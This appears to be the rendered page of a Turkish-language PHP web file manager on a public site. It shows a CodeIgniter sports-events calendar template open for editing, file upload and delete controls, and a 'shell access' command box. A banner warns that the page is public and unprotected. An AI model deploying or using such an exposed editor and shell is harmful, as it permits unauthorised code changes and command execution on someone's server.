⚠️ **YÜKSEK GÜVENLİK RİSKİ:** Bu dosya herkese açık ve şifresizdir. Lütfen sadece **yerel ortamınızda** kullanın ve işiniz bittiğinde **silin**.
Aktif Dizin:
/home/dltain/public_html/app-old/Views/calendar
Dosya Düzenle: index.php
<?=$this->extend('layout/page');?> <?=$this->section('content');?> <h2>📅 Events Calendar <?= esc($year) ?></h2> <table border="1" cellspacing="0" cellpadding="8" width="100%" style="text-align:center; border-collapse:collapse;"> <thead style="background:#006400; color:#fff;"> <tr> <th>WEEK</th> <th>UNDER 10</th> <th>UNDER 12</th> <th>UNDER 14</th> <th>UNDER 16</th> <th>UNDER 18</th> <th>WEEK</th> <th>MEN</th> <th>WOMEN</th> <th>SENIOR</th> </tr> </thead> <tbody> <?php foreach ($weeks as $week => $weekEvents): ?> <tr style="background:#013220; color:#fff;"> <!-- Left Week --> <td><?= date("d, M", strtotime("{$year}-W{$week}-1")) ?></td> <!-- Categories --> <td><?= showEvent($weekEvents, 'Under 10') ?></td> <td><?= showEvent($weekEvents, 'Under 12') ?></td> <td><?= showEvent($weekEvents, 'Under 14') ?></td> <td><?= showEvent($weekEvents, 'Under 16') ?></td> <td><?= showEvent($weekEvents, 'Under 18') ?></td> <!-- Right Week --> <td><?= date("d, M", strtotime("{$year}-W{$week}-1")) ?></td> <td><?= showEvent($weekEvents, 'Men') ?></td> <td><?= showEvent($weekEvents, 'Women') ?></td> <td><?= showEvent($weekEvents, 'Senior') ?></td> </tr> <?php endforeach; ?> </tbody> </table> <?=$this->endSection()?>
Değişiklikleri Kaydet
Yeni Dosya Yükle (Mevcut Dizine)
Yükle
Adı
Tipi
Boyut
İşlemler
📁
.. (Üst Dizin)
📄 index.php
Dosya
1.58 KB
Düzenle
Sil
📄 show.php
Dosya
1.2 KB
Düzenle
Sil
📄 yearly.php
Dosya
2.2 KB
Düzenle
Sil
Sorun Giderme (Shell Erişimi)
Çalıştır